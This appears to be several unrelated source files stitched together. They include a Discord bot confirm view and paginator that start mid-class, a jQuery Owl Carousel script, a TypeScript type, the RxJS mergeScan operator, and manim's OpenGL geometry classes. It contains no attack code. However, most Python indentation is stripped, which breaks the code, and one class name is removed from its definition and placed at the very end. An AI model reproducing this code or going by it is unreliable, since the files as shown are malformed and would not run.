@discord.ui.button(label="Yes", style=discord.ButtonStyle.green)
async def yes(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.is_accepted = True
button.label = 'Yes (chosen)'
await self.disable_update_and_stop(interaction)
@discord.ui.button(label="No", style=discord.ButtonStyle.red)
async def no(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.is_accepted = False
button.label = 'No (chosen)'
await self.disable_update_and_stop(interaction)
async def interaction_check(self, interaction: discord.Interaction):
if interaction.user != self.authorized_user:
await interaction.response.send_message('You cannot answer, you are not the recipient.', ephemeral=True)
return False
return True
async def on_timeout(self):
await self.disable()
async def disable_update_and_stop(self, interaction: discord.Interaction):
await self.disable()
await interaction.response.edit_message(view=self)
self.stop()
async def disable(self):
for child in self.children:
child.disabled = True
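# Illustrative sketch of ConfirmView in a slash command; `ctx` stands for a
# hypothetical discord.ApplicationContext.
async def _example_confirm(ctx):
    view = ConfirmView(authorized_user=ctx.author, timeout=30)
    await ctx.respond('Are you sure?', view=view)
    await view.wait()  # returns once a button is pressed or on timeout
    if view.is_accepted:  # None means the view timed out
        await ctx.respond('Confirmed!')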
class PaginatorCustomStartPage(pages.Paginator):
def __init__(
self,
pages: Union[List[str], List[discord.Embed]],
author_check=True,
custom_view: Optional[discord.ui.View] = None,
timeout: Optional[float] = 180.0,
first_page: int = 0
) -> None:
super().__init__(pages=pages, show_disabled=True, show_indicator=True, author_check=author_check,
disable_on_timeout=True, custom_view=custom_view, timeout=timeout)
if first_page >= len(pages):
first_page = len(pages) - 1
        elif first_page < 0:
            first_page = 0
        self.current_page = first_page
self.update_buttons()
async def respond(self, interaction: discord.Interaction, ephemeral: bool = False):
"""Sends an interaction response or followup with the paginated items.
Parameters
------------
interaction: :class:`discord.Interaction`
The interaction associated with this response.
ephemeral: :class:`bool`
Choose whether the message is ephemeral or not.
Returns
--------
:class:`~discord.Interaction`
The message sent with the paginator.
"""
page = self.pages[self.current_page]
self.user = interaction.user
if interaction.response.is_done():
msg = await interaction.followup.send(
content=page if isinstance(page, str) else None, embed=page if isinstance(page, discord.Embed) else None, view=self, ephemeral=ephemeral
)
else:
msg = await interaction.response.send_message(
content=page if isinstance(page, str) else None, embed=page if isinstance(page, discord.Embed) else None, view=self, ephemeral=ephemeral
)
if isinstance(msg, (discord.WebhookMessage, discord.Message)):
self.message = msg
elif isinstance(msg, discord.Interaction):
self.message = await msg.original_message()
return self.message
# https://stackoverflow.com/questions/49622924/wait-for-timeout-or-event-being-set-for-asyncio-event
async def event_wait(event: asyncio.Event, timeout: float):
# suppress TimeoutError because we'll return False in case of timeout
with contextlib.suppress(asyncio.TimeoutError):
await asyncio.wait_for(event.wait(), timeout)
return event.is_set()
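# Illustrative sketch (hypothetical usage): wait up to 5 seconds for an event
# another task may set, then branch on whether it actually fired.
async def _example_event_wait(stop_event: asyncio.Event):
    if await event_wait(stop_event, timeout=5.0):
        print('event fired')
    else:
        print('timed out')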
main.js | $(document).ready(function() {
$("#nav-mobile").mmenu();
$("#owl-slider").owlCarousel({
pagination: true,
autoPlay: true,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-news").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-seminor").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-testimonial").owlCarousel({
autoPlay: 3000,
items : 2,
itemsDesktop : [1199,2],
itemsDesktopSmall : [992,1],
itemsMobile : [767,1]
});
$("#owl-product-images").owlCarousel({
autoPlay: 3000,
pagination: false,
items : 4,
itemsDesktop : [1199,4],
itemsDesktopSmall : [992,4],
itemsMobile : [767,4]
});
$("#owl-brand").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
items: 5,
itemsDesktop : [1199,5],
itemsDesktopSmall : [992,5]
});
// if( $(window).width() < 768) {
// $("#owl-school").owlCarousel({
// slideSpeed: 300,
// paginationSpeed: 400,
// singleItem: true
// });
// }
// $(window).resize(function(){
// if( $(window).width() < 768) {
// $("#owl-school").owlCarousel({
// slideSpeed: 300,
// paginationSpeed: 400,
// singleItem: true
// });
// }
// });
$("#owl-product-images .item a").on("click", function(){
var data_image = $(this).attr("data-image");
$("#product-image-feature img").attr( "src", data_image);
});
$(".product-tabs-title li a").on("click", function(){
var data_tab = $(this).attr("data-tab");
$(".product-tabs-title li").removeClass("active");
$(this).parent().addClass("active");
$(".tab-content").removeClass("active");
$("#" + data_tab).addClass("active");
});
$("#owl-product-related").owlCarousel({
autoPlay: 3000,
pagination: false,
items : 4,
itemsDesktop : [1199,4],
itemsDesktopSmall : [992,4],
itemsMobile : [767,1]
});
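    // Two-way sync pattern: sync1 (below) is the main slider and sync2 the
    // thumbnail strip. syncPosition mirrors sync1's position onto sync2,
    // while clicking a sync2 item drives sync1 through the owl.goTo event.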
var sync1 = $("#sync1");
var sync2 = $("#sync2");
sync1.owlCarousel({
singleItem : true,
slideSpeed : 1000,
navigation: true,
pagination:false,
afterAction : syncPosition,
responsiveRefreshRate : 200,
});
sync2.owlCarousel({
items : 5,
itemsDesktop : [1199,5],
itemsDesktopSmall : [979,5],
itemsTablet : [768,4],
itemsMobile : [479,3],
pagination:false,
responsiveRefreshRate : 100,
afterInit : function(el){
el.find(".owl-item").eq(0).addClass("synced");
}
});
    function syncPosition(el){
var current = this.currentItem;
$("#sync2")
.find(".owl-item")
.removeClass("synced")
.eq(current)
.addClass("synced")
if($("#sync2").data("owlCarousel") !== undefined){
}
}
$("#sync2").on("click", ".owl-item", function(e){
e.preventDefault();
var number = $(this).data("owlItem");
sync1.trigger("owl.goTo",number);
});
});
ImportPreviewColumn.type.ts | export type ImportPreviewColumn = {
  value: any;
  isValid: boolean;
};
mergeScan.ts | import { Operator } from '../Operator';
import { Observable } from '../Observable';
import { Subscriber } from '../Subscriber';
import { ObservableInput, OperatorFunction } from '../types';
import { lift } from '../util/lift';
import { SimpleInnerSubscriber, SimpleOuterSubscriber, innerSubscribe } from '../innerSubscribe';
/**
* Applies an accumulator function over the source Observable where the
* accumulator function itself returns an Observable, then each intermediate
* Observable returned is merged into the output Observable.
*
* <span class="informal">It's like {@link scan}, but the Observables returned
* by the accumulator are merged into the outer Observable.</span>
*
* ## Example
* Count the number of click events
* ```ts
* import { fromEvent, of } from 'rxjs';
* import { mapTo, mergeScan } from 'rxjs/operators';
*
* const click$ = fromEvent(document, 'click');
* const one$ = click$.pipe(mapTo(1));
* const seed = 0;
* const count$ = one$.pipe(
* mergeScan((acc, one) => of(acc + one), seed),
* );
* count$.subscribe(x => console.log(x));
*
* // Results:
 * // 1
 * // 2
 * // 3
 * // 4
* // ...and so on for each click
* ```
*
* @param {function(acc: R, value: T): Observable<R>} accumulator
* The accumulator function called on each source value.
* @param seed The initial accumulation value.
* @param {number} [concurrent=Infinity] Maximum number of
* input Observables being subscribed to concurrently.
* @return {Observable<R>} An observable of the accumulated values.
* @name mergeScan
*/
export function mergeScan<T, R>(accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
seed: R,
concurrent: number = Infinity): OperatorFunction<T, R> {
return (source: Observable<T>) => lift(source, new MergeScanOperator(accumulator, seed, concurrent));
}
export class MergeScanOperator<T, R> implements Operator<T, R> {
constructor(private accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
private seed: R,
private concurrent: number) {
}
call(subscriber: Subscriber<R>, source: any): any {
return source.subscribe(new MergeScanSubscriber(
subscriber, this.accumulator, this.seed, this.concurrent
));
}
}
/**
* We need this JSDoc comment for affecting ESDoc.
* @ignore
* @extends {Ignored}
*/
export class MergeScanSubscriber<T, R> extends SimpleOuterSubscriber<T, R> {
private hasValue: boolean = false;
private hasCompleted: boolean = false;
private buffer: Observable<any>[] = [];
private active: number = 0;
protected index: number = 0;
constructor(protected destination: Subscriber<R>,
private accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
private acc: R,
private concurrent: number) {
super(destination);
}
protected _next(value: any): void {
if (this.active < this.concurrent) {
const index = this.index++;
const destination = this.destination;
let ish;
try {
const { accumulator } = this;
ish = accumulator(this.acc, value, index);
} catch (e) {
return destination.error(e);
}
this.active++;
this._innerSub(ish);
} else {
this.buffer.push(value);
}
}
private _innerSub(ish: any): void {
const innerSubscriber = new SimpleInnerSubscriber(this);
this.destination.add(innerSubscriber);
innerSubscribe(ish, innerSubscriber);
}
protected _complete(): void {
this.hasCompleted = true;
if (this.active === 0 && this.buffer.length === 0) {
if (this.hasValue === false) {
this.destination.next(this.acc);
}
this.destination.complete();
}
this.unsubscribe();
}
notifyNext(innerValue: R): void {
const { destination } = this;
this.acc = innerValue;
this.hasValue = true;
destination.next(innerValue);
}
notifyComplete(): void {
const buffer = this.buffer;
this.active--;
if (buffer.length > 0) {
this._next(buffer.shift());
} else if (this.active === 0 && this.hasCompleted) {
if (this.hasValue === false) {
this.destination.next(this.acc);
}
this.destination.complete();
}
}
}
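// Illustrative sketch (hypothetical stream; assumes `of` and `delay` are
// imported from rxjs): with concurrent = 1 the inner observables produced by
// the accumulator run one at a time, giving scan-like ordering even when the
// accumulation itself is asynchronous:
//
//   of(1, 2, 3).pipe(
//     mergeScan((acc, n) => of(acc + n).pipe(delay(10)), 0, 1),
//   ).subscribe(console.log); // 1, 3, 6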
opengl_geometry.py | import numpy as np
from .. import logger
from ..constants import *
from ..mobject.mobject import Mobject
from ..mobject.types.opengl_vectorized_mobject import (
OpenGLDashedVMobject,
OpenGLVGroup,
OpenGLVMobject,
)
from ..utils.color import *
from ..utils.deprecation import deprecated_params
from ..utils.iterables import adjacent_n_tuples, adjacent_pairs
from ..utils.simple_functions import clip, fdiv
from ..utils.space_ops import (
angle_between_vectors,
angle_of_vector,
compass_directions,
find_intersection,
normalize,
rotate_vector,
rotation_matrix_transpose,
)
DEFAULT_DOT_RADIUS = 0.08
DEFAULT_SMALL_DOT_RADIUS = 0.04
DEFAULT_DASH_LENGTH = 0.05
DEFAULT_ARROW_TIP_LENGTH = 0.35
DEFAULT_ARROW_TIP_WIDTH = 0.35
class OpenGLTipableVMobject(OpenGLVMobject):
"""
Meant for shared functionality between Arc and Line.
Functionality can be classified broadly into these groups:
* Adding, Creating, Modifying tips
- add_tip calls create_tip, before pushing the new tip
into the TipableVMobject's list of submobjects
- stylistic and positional configuration
* Checking for tips
- Boolean checks for whether the TipableVMobject has a tip
and a starting tip
* Getters
- Straightforward accessors, returning information pertaining
to the TipableVMobject instance's tip(s), its length etc
"""
# Adding, Creating, Modifying tips
def __init__(
self,
tip_length=DEFAULT_ARROW_TIP_LENGTH,
normal_vector=OUT,
tip_config={},
**kwargs
):
self.tip_length = tip_length
self.normal_vector = normal_vector
self.tip_config = tip_config
OpenGLVMobject.__init__(self, **kwargs)
def add_tip(self, at_start=False, **kwargs):
"""
Adds a tip to the TipableVMobject instance, recognising
that the endpoints might need to be switched if it's
a 'starting tip' or not.
"""
tip = self.create_tip(at_start, **kwargs)
self.reset_endpoints_based_on_tip(tip, at_start)
        self.assign_tip_attr(tip, at_start)
self.add(tip)
return self
def create_tip(self, at_start=False, **kwargs):
"""
        Stylises the tip, positions it spatially, and returns
the newly instantiated tip to the caller.
"""
tip = self.get_unpositioned_tip(**kwargs)
self.position_tip(tip, at_start)
return tip
def get_unpositioned_tip(self, **kwargs):
"""
Returns a tip that has been stylistically configured,
but has not yet been given a position in space.
"""
config = {}
config.update(self.tip_config)
config.update(kwargs)
return OpenGLArrowTip(**config)
def position_tip(self, tip, at_start=False):
# Last two control points, defining both
# the end, and the tangency direction
if at_start:
anchor = self.get_start()
handle = self.get_first_handle()
else:
handle = self.get_last_handle()
anchor = self.get_end()
tip.rotate(angle_of_vector(handle - anchor) - PI - tip.get_angle())
tip.shift(anchor - tip.get_tip_point())
return tip
def reset_endpoints_based_on_tip(self, tip, at_start):
if self.get_length() == 0:
# Zero length, put_start_and_end_on wouldn't
# work
return self
if at_start:
start = tip.get_base()
end = self.get_end()
else:
start = self.get_start()
end = tip.get_base()
self.put_start_and_end_on(start, end)
return self
    def assign_tip_attr(self, tip, at_start):
if at_start:
self.start_tip = tip
else:
self.tip = tip
return self
# Checking for tips
def has_tip(self):
return hasattr(self, "tip") and self.tip in self
def has_start_tip(self):
return hasattr(self, "start_tip") and self.start_tip in self
# Getters
def pop_tips(self):
start, end = self.get_start_and_end()
result = OpenGLVGroup()
if self.has_tip():
result.add(self.tip)
self.remove(self.tip)
if self.has_start_tip():
result.add(self.start_tip)
self.remove(self.start_tip)
self.put_start_and_end_on(start, end)
return result
def get_tips(self):
"""
Returns a VGroup (collection of VMobjects) containing
the TipableVMObject instance's tips.
"""
result = OpenGLVGroup()
if hasattr(self, "tip"):
result.add(self.tip)
if hasattr(self, "start_tip"):
result.add(self.start_tip)
return result
def get_tip(self):
"""Returns the TipableVMobject instance's (first) tip,
otherwise throws an exception."""
tips = self.get_tips()
if len(tips) == 0:
raise Exception("tip not found")
else:
return tips[0]
def get_default_tip_length(self):
return self.tip_length
def get_first_handle(self):
return self.points[1]
def get_last_handle(self):
return self.points[-2]
def get_end(self):
if self.has_tip():
return self.tip.get_start()
else:
return OpenGLVMobject.get_end(self)
def get_start(self):
if self.has_start_tip():
return self.start_tip.get_start()
else:
return OpenGLVMobject.get_start(self)
def get_length(self):
start, end = self.get_start_and_end()
return np.linalg.norm(start - end)
class OpenGLArc(OpenGLTipableVMobject):
def __init__(
self,
start_angle=0,
angle=TAU / 4,
radius=1.0,
n_components=8,
arc_center=ORIGIN,
**kwargs
):
self.start_angle = start_angle
self.angle = angle
self.radius = radius
self.n_components = n_components
self.arc_center = arc_center
        super().__init__(**kwargs)
self.orientation = -1
def init_points(self):
self.set_points(
OpenGLArc.create_quadratic_bezier_points(
angle=self.angle,
start_angle=self.start_angle,
n_components=self.n_components,
)
)
# To maintain proper orientation for fill shaders.
self.scale(self.radius, about_point=ORIGIN)
self.shift(self.arc_center)
@staticmethod
def create_quadratic_bezier_points(angle, start_angle=0, n_components=8):
samples = np.array(
[
[np.cos(a), np.sin(a), 0]
for a in np.linspace(
start_angle,
start_angle + angle,
2 * n_components + 1,
)
]
)
theta = angle / n_components
samples[1::2] /= np.cos(theta / 2)
points = np.zeros((3 * n_components, 3))
points[0::3] = samples[0:-1:2]
points[1::3] = samples[1::2]
points[2::3] = samples[2::2]
return points
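    # Illustrative check (hypothetical values): for a quarter turn in one
    # component, the middle sample is pushed out by 1 / cos(theta / 2) so the
    # quadratic Bezier hugs the unit circle:
    #   pts = OpenGLArc.create_quadratic_bezier_points(TAU / 4, n_components=1)
    #   np.linalg.norm(pts[1])  # ~1.414 == 1 / np.cos(TAU / 8)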
def get_arc_center(self):
"""
Looks at the normals to the first two
anchors, and finds their intersection points
"""
# First two anchors and handles
a1, h, a2 = self.points[:3]
# Tangent vectors
t1 = h - a1
t2 = h - a2
# Normals
n1 = rotate_vector(t1, TAU / 4)
n2 = rotate_vector(t2, TAU / 4)
return find_intersection(a1, n1, a2, n2)
def get_start_angle(self):
angle = angle_of_vector(self.get_start() - self.get_arc_center())
return angle % TAU
def get_stop_angle(self):
angle = angle_of_vector(self.get_end() - self.get_arc_center())
return angle % TAU
def move_arc_center_to(self, point):
self.shift(point - self.get_arc_center())
return self
class OpenGLArcBetweenPoints(OpenGLArc):
def __init__(self, start, end, angle=TAU / 4, **kwargs):
super().__init__(angle=angle, **kwargs)
if angle == 0:
self.set_points_as_corners([LEFT, RIGHT])
self.put_start_and_end_on(start, end)
class OpenGLCurvedArrow(OpenGLArcBetweenPoints):
def __init__(self, start_point, end_point, **kwargs):
OpenGLArcBetweenPoints.__init__(self, start_point, end_point, **kwargs)
self.add_tip()
class OpenGLCurvedDoubleArrow(OpenGLCurvedArrow):
def __init__(self, start_point, end_point, **kwargs):
OpenGLCurvedArrow.__init__(self, start_point, end_point, **kwargs)
self.add_tip(at_start=True)
class OpenGLCircle(OpenGLArc):
def __init__(self, color=RED, **kwargs):
OpenGLArc.__init__(self, 0, TAU, color=color, **kwargs)
def surround(self, mobject, dim_to_match=0, stretch=False, buff=MED_SMALL_BUFF):
# Ignores dim_to_match and stretch; result will always be a circle
        # TODO: Perhaps create an ellipse class to handle single-dimension stretching
self.replace(mobject, dim_to_match, stretch)
self.stretch((self.get_width() + 2 * buff) / self.get_width(), 0)
self.stretch((self.get_height() + 2 * buff) / self.get_height(), 1)
def point_at_angle(self, angle):
start_angle = self.get_start_angle()
return self.point_from_proportion((angle - start_angle) / TAU)
class OpenGLDot(OpenGLCircle):
def __init__(
self,
point=ORIGIN,
radius=DEFAULT_DOT_RADIUS,
stroke_width=0,
fill_opacity=1.0,
color=WHITE,
**kwargs
):
super().__init__(
arc_center=point,
radius=radius,
stroke_width=stroke_width,
fill_opacity=fill_opacity,
color=color,
**kwargs
)
class OpenGLEllipse(OpenGLCircle):
def __init__(self, width=2, height=1, **kwargs):
super().__init__(**kwargs)
self.set_width(width, stretch=True)
self.set_height(height, stretch=True)
class OpenGLAnnularSector(OpenGLArc):
def __init__(
self,
inner_radius=1,
outer_radius=2,
angle=TAU / 4,
start_angle=0,
fill_opacity=1,
stroke_width=0,
color=WHITE,
**kwargs
):
self.inner_radius = inner_radius
self.outer_radius = outer_radius
OpenGLArc.__init__(
self,
start_angle=start_angle,
angle=angle,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
color=color,
**kwargs
)
def init_points(self):
inner_arc, outer_arc = (
OpenGLArc(
start_angle=self.start_angle,
angle=self.angle,
radius=radius,
arc_center=self.arc_center,
)
for radius in (self.inner_radius, self.outer_radius)
)
outer_arc.reverse_points()
self.append_points(inner_arc.points)
self.add_line_to(outer_arc.points[0])
self.append_points(outer_arc.points)
self.add_line_to(inner_arc.points[0])
class OpenGLSector(OpenGLAnnularSector):
def __init__(self, outer_radius=1, inner_radius=0, **kwargs):
OpenGLAnnularSector.__init__(
self, inner_radius=inner_radius, outer_radius=outer_radius, **kwargs
)
class OpenGLAnnulus(OpenGLCircle):
def __init__(
self,
inner_radius=1,
outer_radius=2,
fill_opacity=1,
stroke_width=0,
color=WHITE,
mark_paths_closed=False,
**kwargs
):
self.mark_paths_closed = mark_paths_closed # is this even used?
self.inner_radius = inner_radius
self.outer_radius = outer_radius
OpenGLCircle.__init__(
self,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
color=color,
**kwargs
)
def init_points(self):
self.radius = self.outer_radius
outer_circle = OpenGLCircle(radius=self.outer_radius)
inner_circle = OpenGLCircle(radius=self.inner_radius)
inner_circle.reverse_points()
self.append_points(outer_circle.points)
self.append_points(inner_circle.points)
self.shift(self.arc_center)
class OpenGLLine(OpenGLTipableVMobject):
def __init__(self, start=LEFT, end=RIGHT, buff=0, path_arc=0, **kwargs):
self.dim = 3
self.buff = buff
self.path_arc = path_arc
self.set_start_and_end_attrs(start, end)
super().__init__(**kwargs)
def init_points(self):
self.set_points_by_ends(self.start, self.end, self.buff, self.path_arc)
def set_points_by_ends(self, start, end, buff=0, path_arc=0):
if path_arc:
self.set_points(OpenGLArc.create_quadratic_bezier_points(path_arc))
self.put_start_and_end_on(start, end)
else:
self.set_points_as_corners([start, end])
self.account_for_buff(self.buff)
def set_path_arc(self, new_value):
self.path_arc = new_value
self.init_points()
def account_for_buff(self, buff):
if buff == 0:
return
#
if self.path_arc == 0:
length = self.get_length()
else:
length = self.get_arc_length()
#
if length < 2 * buff:
return
buff_prop = buff / length
self.pointwise_become_partial(self, buff_prop, 1 - buff_prop)
return self
def set_start_and_end_attrs(self, start, end):
# If either start or end are Mobjects, this
# gives their centers
rough_start = self.pointify(start)
rough_end = self.pointify(end)
vect = normalize(rough_end - rough_start)
# Now that we know the direction between them,
# we can find the appropriate boundary point from
# start and end, if they're mobjects
self.start = self.pointify(start, vect) + self.buff * vect
self.end = self.pointify(end, -vect) - self.buff * vect
def pointify(self, mob_or_point, direction=None):
"""
Take an argument passed into Line (or subclass) and turn
it into a 3d point.
"""
if isinstance(mob_or_point, Mobject):
mob = mob_or_point
if direction is None:
return mob.get_center()
else:
return mob.get_continuous_bounding_box_point(direction)
else:
point = mob_or_point
result = np.zeros(self.dim)
result[: len(point)] = point
return result
def put_start_and_end_on(self, start, end):
curr_start, curr_end = self.get_start_and_end()
if (curr_start == curr_end).all():
self.set_points_by_ends(start, end, self.path_arc)
return super().put_start_and_end_on(start, end)
def get_vector(self):
return self.get_end() - self.get_start()
def get_unit_vector(self):
return normalize(self.get_vector())
def get_angle(self):
return angle_of_vector(self.get_vector())
def get_projection(self, point):
"""
Return projection of a point onto the line
"""
unit_vect = self.get_unit_vector()
start = self.get_start()
return start + np.dot(point - start, unit_vect) * unit_vect
def get_slope(self):
return np.tan(self.get_angle())
def set_angle(self, angle, about_point=None):
if about_point is None:
about_point = self.get_start()
self.rotate(
angle - self.get_angle(),
about_point=about_point,
)
return self
def set_length(self, length):
self.scale(length / self.get_length())
class OpenGLDashedLine(OpenGLLine):
@deprecated_params(
params="positive_space_ratio dash_spacing",
since="v0.9.0",
message="Use dashed_ratio instead of positive_space_ratio.",
)
def __init__(
self, *args, dash_length=DEFAULT_DASH_LENGTH, dashed_ratio=0.5, **kwargs
):
# Simplify with removal of deprecation warning
self.dash_spacing = kwargs.pop("dash_spacing", None) # Unused param
self.dashed_ratio = kwargs.pop("positive_space_ratio", None) or dashed_ratio
self.dash_length = dash_length
super().__init__(*args, **kwargs)
dashed_ratio = self.dashed_ratio
num_dashes = self.calculate_num_dashes(dashed_ratio)
dashes = OpenGLDashedVMobject(
self, num_dashes=num_dashes, dashed_ratio=dashed_ratio
)
self.clear_points()
self.add(*dashes)
def calculate_num_dashes(self, dashed_ratio):
return max(
2, int(np.ceil((self.get_length() / self.dash_length) * dashed_ratio))
)
def get_start(self):
if len(self.submobjects) > 0:
return self.submobjects[0].get_start()
else:
return OpenGLLine.get_start(self)
def get_end(self):
if len(self.submobjects) > 0:
return self.submobjects[-1].get_end()
else:
return OpenGLLine.get_end(self)
def get_first_handle(self):
return self.submobjects[0].points[1]
def get_last_handle(self):
return self.submobjects[-1].points[-2]
class OpenGLTangentLine(OpenGLLine):
def __init__(self, vmob, alpha, length=1, d_alpha=1e-6, **kwargs):
self.length = length
self.d_alpha = d_alpha
da = self.d_alpha
a1 = clip(alpha - da, 0, 1)
a2 = clip(alpha + da, 0, 1)
super().__init__(vmob.pfp(a1), vmob.pfp(a2), **kwargs)
self.scale(self.length / self.get_length())
class OpenGLElbow(OpenGLVMobject):
def __init__(self, width=0.2, angle=0, **kwargs):
self.angle = angle
        super().__init__(**kwargs)
self.set_points_as_corners([UP, UP + RIGHT, RIGHT])
self.set_width(width, about_point=ORIGIN)
self.rotate(self.angle, about_point=ORIGIN)
class | (OpenGLLine):
def __init__(
self,
start=LEFT,
end=RIGHT,
path_arc=0,
fill_color=GREY_A,
fill_opacity=1,
stroke_width=0,
buff=MED_SMALL_BUFF,
thickness=0.05,
tip_width_ratio=5,
tip_angle=PI / 3,
max_tip_length_to_length_ratio=0.5,
max_width_to_length_ratio=0.1,
**kwargs
):
self.thickness = thickness
self.tip_width_ratio = tip_width_ratio
self.tip_angle = tip_angle
self.max_tip_length_to_length_ratio = max_tip_length_to_length_ratio
self.max_width_to_length_ratio = max_width_to_length_ratio
super().__init__(
start=start,
end=end,
buff=buff,
path_arc=path_arc,
fill_color=fill_color,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
**kwargs
)
def set_points_by_ends(self, start, end, buff=0, path_arc=0):
# Find the right tip length and thickness
vect = end - start
length = max(np.linalg.norm(vect), 1e-8)
thickness = self.thickness
w_ratio = fdiv(self.max_width_to_length_ratio, fdiv(thickness, length))
if w_ratio < 1:
thickness *= w_ratio
tip_width = self.tip_width_ratio * thickness
tip_length = tip_width / (2 * np.tan(self.tip_angle / 2))
t_ratio = fdiv(self.max_tip_length_to_length_ratio, fdiv(tip_length, length))
if t_ratio < 1:
tip_length *= t_ratio
tip_width *= t_ratio
# Find points for the stem
if path_arc == 0:
points1 = (length - tip_length) * np.array([RIGHT, 0.5 * RIGHT, ORIGIN])
points1 += thickness * UP / 2
points2 = points1[::-1] + thickness * DOWN
else:
# Solve for radius so that the tip-to-tail length matches |end - start|
a = 2 * (1 - np.cos(path_arc))
b = -2 * tip_length * np.sin(path_arc)
c = tip_length ** 2 - length ** 2
R = (-b + np.sqrt(b ** 2 - 4 * a * c)) / (2 * a)
# Find arc points
points1 = OpenGLArc.create_quadratic_bezier_points(path_arc)
points2 = np.array(points1[::-1])
points1 *= R + thickness / 2
points2 *= R - thickness / 2
if path_arc < 0:
tip_length *= -1
rot_T = rotation_matrix_transpose(PI / 2 - path_arc, OUT)
for points in points1, points2:
points[:] = np.dot(points, rot_T)
points += R * DOWN
self.set_points(points1)
# Tip
self.add_line_to(tip_width * UP / 2)
self.add_line_to(tip_length * LEFT)
self.tip_index = len(self.points) - 1
self.add_line_to(tip_width * DOWN / 2)
self.add_line_to(points2[0])
# Close it out
self.append_points(points2)
self.add_line_to(points1[0])
if length > 0:
# Final correction
super().scale(length / self.get_length())
self.rotate(angle_of_vector(vect) - self.get_angle())
self.rotate(
PI / 2 - np.arccos(normalize(vect)[2]),
axis=rotate_vector(self.get_unit_vector(), -PI / 2),
)
self.shift(start - self.get_start())
self.refresh_triangulation()
def reset_points_around_ends(self):
self.set_points_by_ends(
self.get_start(), self.get_end(), path_arc=self.path_arc
)
return self
def get_start(self):
nppc = self.n_points_per_curve
points = self.points
return (points[0] + points[-nppc]) / 2
def get_end(self):
return self.points[self.tip_index]
def put_start_and_end_on(self, start, end):
self.set_points_by_ends(start, end, buff=0, path_arc=self.path_arc)
return self
def scale(self, *args, **kwargs):
super().scale(*args, **kwargs)
self.reset_points_around_ends()
return self
def set_thickness(self, thickness):
self.thickness = thickness
self.reset_points_around_ends()
return self
def set_path_arc(self, path_arc):
self.path_arc = path_arc
self.reset_points_around_ends()
return self
class OpenGLVector(OpenGLArrow):
def __init__(self, direction=RIGHT, buff=0, **kwargs):
self.buff = buff
if len(direction) == 2:
direction = np.hstack([direction, 0])
super().__init__(ORIGIN, direction, buff=buff, **kwargs)
class OpenGLDoubleArrow(OpenGLArrow):
def __init__(self, *args, **kwargs):
OpenGLArrow.__init__(self, *args, **kwargs)
self.add_tip(at_start=True)
class OpenGLCubicBezier(OpenGLVMobject):
def __init__(self, a0, h0, h1, a1, **kwargs):
OpenGLVMobject.__init__(self, **kwargs)
self.add_cubic_bezier_curve(a0, h0, h1, a1)
class OpenGLPolygon(OpenGLVMobject):
def __init__(self, *vertices, **kwargs):
self.vertices = vertices
super().__init__(**kwargs)
def init_points(self):
verts = self.vertices
self.set_points_as_corners([*verts, verts[0]])
def get_vertices(self):
return self.get_start_anchors()
def round_corners(self, radius=0.5):
vertices = self.get_vertices()
arcs = []
for v1, v2, v3 in adjacent_n_tuples(vertices, 3):
vect1 = v2 - v1
vect2 = v3 - v2
unit_vect1 = normalize(vect1)
unit_vect2 = normalize(vect2)
angle = angle_between_vectors(vect1, vect2)
# Negative radius gives concave curves
angle *= np.sign(radius)
# Distance between vertex and start of the arc
cut_off_length = radius * np.tan(angle / 2)
# Determines counterclockwise vs. clockwise
sign = np.sign(np.cross(vect1, vect2)[2])
arc = OpenGLArcBetweenPoints(
v2 - unit_vect1 * cut_off_length,
v2 + unit_vect2 * cut_off_length,
angle=sign * angle,
n_components=2,
)
arcs.append(arc)
self.clear_points()
# To ensure that we loop through starting with last
arcs = [arcs[-1], *arcs[:-1]]
for arc1, arc2 in adjacent_pairs(arcs):
self.append_points(arc1.points)
line = OpenGLLine(arc1.get_end(), arc2.get_start())
# Make sure anchors are evenly distributed
len_ratio = line.get_length() / arc1.get_arc_length()
line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))
self.append_points(line.points)
return self
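    # Illustrative sketch (hypothetical call): each vertex is replaced by an
    # arc whose endpoints sit cut_off_length back along the adjacent edges:
    #   OpenGLRegularPolygon(n=4).round_corners(radius=0.25)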
class OpenGLRegularPolygon(OpenGLPolygon):
def __init__(self, n=6, start_angle=None, **kwargs):
self.start_angle = start_angle
if self.start_angle is None:
if n % 2 == 0:
self.start_angle = 0
else:
self.start_angle = 90 * DEGREES
start_vect = rotate_vector(RIGHT, self.start_angle)
vertices = compass_directions(n, start_vect)
super().__init__(*vertices, **kwargs)
class OpenGLTriangle(OpenGLRegularPolygon):
def __init__(self, **kwargs):
super().__init__(n=3, **kwargs)
class OpenGLArrowTip(OpenGLTriangle):
def __init__(
self,
fill_opacity=1,
fill_color=WHITE,
stroke_width=0,
width=DEFAULT_ARROW_TIP_WIDTH,
length=DEFAULT_ARROW_TIP_LENGTH,
angle=0,
**kwargs
):
OpenGLTriangle.__init__(
self,
start_angle=0,
fill_opacity=fill_opacity,
fill_color=fill_color,
stroke_width=stroke_width,
**kwargs
)
self.set_width(width, stretch=True)
self.set_height(length, stretch=True)
def get_base(self):
return self.point_from_proportion(0.5)
def get_tip_point(self):
return self.points[0]
def get_vector(self):
return self.get_tip_point() - self.get_base()
def get_angle(self):
return angle_of_vector(self.get_vector())
def get_length(self):
return np.linalg.norm(self.get_vector())
class OpenGLRectangle(OpenGLPolygon):
def __init__(self, color=WHITE, width=4.0, height=2.0, **kwargs):
OpenGLPolygon.__init__(self, UR, UL, DL, DR, color=color, **kwargs)
self.set_width(width, stretch=True)
self.set_height(height, stretch=True)
class OpenGLSquare(OpenGLRectangle):
def __init__(self, side_length=2.0, **kwargs):
self.side_length = side_length
super().__init__(height=side_length, width=side_length, **kwargs)
class OpenGLRoundedRectangle(OpenGLRectangle):
def __init__(self, corner_radius=0.5, **kwargs):
self.corner_radius = corner_radius
OpenGLRectangle.__init__(self, **kwargs)
self.round_corners(self.corner_radius)
| OpenGLArrow |
